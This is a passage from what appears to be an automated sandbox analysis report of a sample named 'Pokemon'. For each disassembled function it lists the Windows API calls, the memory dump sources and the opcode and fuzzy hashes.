                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95d705af07ce79a4116fca3fa7539fa64608fe28bcbbdb007d4629f8c01e6272
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E718F75A00219BFCB14EFA4D845AEEB7B1EF48310F118469E816EB351DB74AE51CB90
                                                                                                                                                                                                                                                                                      Function 001288F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00128992
                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0012899E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00128A79
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00128AAC
                                                                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 00128AE4
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 00128B06
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00128B1E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2351ce5ee3b6b5c9c91fe869909fc3980a75c968dd6cfd64fc5b55ff8c73efc7
                                                                                                                                                                                                                                                                                      • Instruction ID: cfadeeb08488b4556f5f97f84974b629f557eb407300b2076a08762324f98ddd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2351ce5ee3b6b5c9c91fe869909fc3980a75c968dd6cfd64fc5b55ff8c73efc7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5771C074A02224AFEF359F54E884FBABBB9FF49304F140459E84567261CF35A9A1DB20
                                                                                                                                                                                                                                                                                      Function 000FB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 000FB8C0
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FB8D5
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 000FB936
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 000FB964
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 000FB983
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 000FB9C4
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000FB9E7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 26f0bea40b8515a781713a4d6c11c34e19748ba83711f366eb9eb24fe06e25c8
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f0c6e4ccac1d6179544da7436c97aeffd6f3b5dbd26f39de5531c5fe1e0c3a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26f0bea40b8515a781713a4d6c11c34e19748ba83711f366eb9eb24fe06e25c8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF51CDA06086D93EFB364234C845BBABEE95B06304F088489E2D546CD2C7D8ECC4EB51
                                                                                                                                                                                                                                                                                      Function 000FB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 000FB6E0
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FB6F5
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 000FB756
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000FB782
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000FB79F
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000FB7DE
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000FB7FF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6cb7c2f84dfc58a6ff3904d7a0d9b85ddfdd2617e52a7267ce5a09bcc6a5f162
                                                                                                                                                                                                                                                                                      • Instruction ID: e8dd83b9c02c317364969b1f3b6570bacbca65bef78d52bc88422dbaa386b78c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cb7c2f84dfc58a6ff3904d7a0d9b85ddfdd2617e52a7267ce5a09bcc6a5f162
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C51F3A0A087D93DFB329224CC15BBA7EE85B45344F0C8489E2D446CD2D794EC95FF50
                                                                                                                                                                                                                                                                                      Function 000C57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,000C5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 000C57E3
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 000C585E
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 000C5879
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 000C589F
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,000C5F16,00000000,?,?,?,?,?,?,?,?,?,000C5F16,?), ref: 000C58BE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,000C5F16,00000000,?,?,?,?,?,?,?,?,?,000C5F16,?), ref: 000C58F7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 60fb7e328a33a7b160526da6a1f9d66feb3d7bbcf570c67975a677b7725f7889
                                                                                                                                                                                                                                                                                      • Instruction ID: ecfcf017ab1dac4d5e72feed057408302d9ab3c098c33f6e94e32e118747ec35
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60fb7e328a33a7b160526da6a1f9d66feb3d7bbcf570c67975a677b7725f7889
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB519D74A00649AFCB10CFA8DC85FEEBBF8EB08311F14415EE952E7291D730A991CB61
                                                                                                                                                                                                                                                                                      Function 000B3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 000B30BB
                                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 000B30C3
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 000B3151
                                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 000B317C
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 000B31D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: 4106511262632622f416417fdc0ad1fa2850179705e6759adac3a15e081b8cdd
                                                                                                                                                                                                                                                                                      • Instruction ID: 97fa4c9be74f1160da7b31ac348a7aa5c65b6d5263d088cdc4ce65d2b0eb6699
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4106511262632622f416417fdc0ad1fa2850179705e6759adac3a15e081b8cdd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95418334A00218ABCF20DFACCC95ADEBBF9AF44324F248555E815AB392D731DB55CB91
                                                                                                                                                                                                                                                                                      Function 00111B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00113AD7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: _wcslen.LIBCMT ref: 00113AF8
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00111B6F
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111B7E
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111C26
                                                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00111C56
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c833e186f3bcaaa52f3f14cec34477b7ead027eb3a4c39d3d31a2e164ce5ec06
                                                                                                                                                                                                                                                                                      • Instruction ID: d0e0f3fac91f31fa931c6c76176ad5966af7f93b46c40e4b57e2f145b1dc88c9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c833e186f3bcaaa52f3f14cec34477b7ead027eb3a4c39d3d31a2e164ce5ec06
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B241D231604114BFDB249F24D884BE9BBE9EF45324F148069F919AB292D774EDC1CBE1
                                                                                                                                                                                                                                                                                      Function 000FD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000FD7CD,?), ref: 000FE714
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000FD7CD,?), ref: 000FE72D
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000FD7F0
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000FD82A
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FD8B0
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FD8C6
                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 000FD90C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                                                      • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                      • Opcode ID: 8b77d46cd7c7c59b2e84e73362abb37f9347eb0e5e3bbf21da434d99628b66f6
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a0113623763f56498e7e2cc60558e35764df352f9cb28ef9a1decc6f961efba
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b77d46cd7c7c59b2e84e73362abb37f9347eb0e5e3bbf21da434d99628b66f6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E841967180525C9EDF52EBA0D985BED77F9AF08380F0000E7A605EB542EF34A789DB10
                                                                                                                                                                                                                                                                                      Function 00123899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001238B8
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001238EB
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00123920
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00123952
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0012397C
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0012398D
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001239A7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 80fe31b870e4861880f0ac89e030264b889547926d9c7f909a3bb18aa26ae47e
                                                                                                                                                                                                                                                                                      • Instruction ID: 49320900e6b467aaa23a2cb745c80c8e540bea3d68982d8cb807ec70341e9a5c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fe31b870e4861880f0ac89e030264b889547926d9c7f909a3bb18aa26ae47e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6314430704265AFDB21CF48EC84F6437A1FB8A718F1512A4F5249F6B1CBB8ADA5CB01
                                                                                                                                                                                                                                                                                      Function 000F808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F80D0
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F80F6
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 000F80F9
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000F8117
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 000F8120
                                                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000F8145
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000F8153
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d88620ecbfc29abd2d6bef38fe6c40fac2928b561083facb7ad99dbba96153a
                                                                                                                                                                                                                                                                                      • Instruction ID: b15693a27cc437c5c4945d01fb7dfdd1ed940dcf125382ec7f9c8acbfe13fcae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d88620ecbfc29abd2d6bef38fe6c40fac2928b561083facb7ad99dbba96153a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16217172600219BF9F60ABA8DC84CFA73ECFB493607048525FA05DB690DB70AC869760
                                                                                                                                                                                                                                                                                      Function 000F8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F81A9
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F81CF
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 000F81D2
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 000F81F3
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 000F81FC
                                                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000F8216
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000F8224
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 914c6839675ab62ed9747cf6d93844288ef88d0ddcd8a94b058b818b894280ad
                                                                                                                                                                                                                                                                                      • Instruction ID: 4bf14e626bbc50dd794e257db89824dc5a3641d350adca96feb87d1bc3494961
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 914c6839675ab62ed9747cf6d93844288ef88d0ddcd8a94b058b818b894280ad
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F214775604508BFDB50ABACEC89DFA77ECEB09360714C125FA05CB5A1DA70EC82DB64
                                                                                                                                                                                                                                                                                      Function 00100E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00100E99
                                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00100ED5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
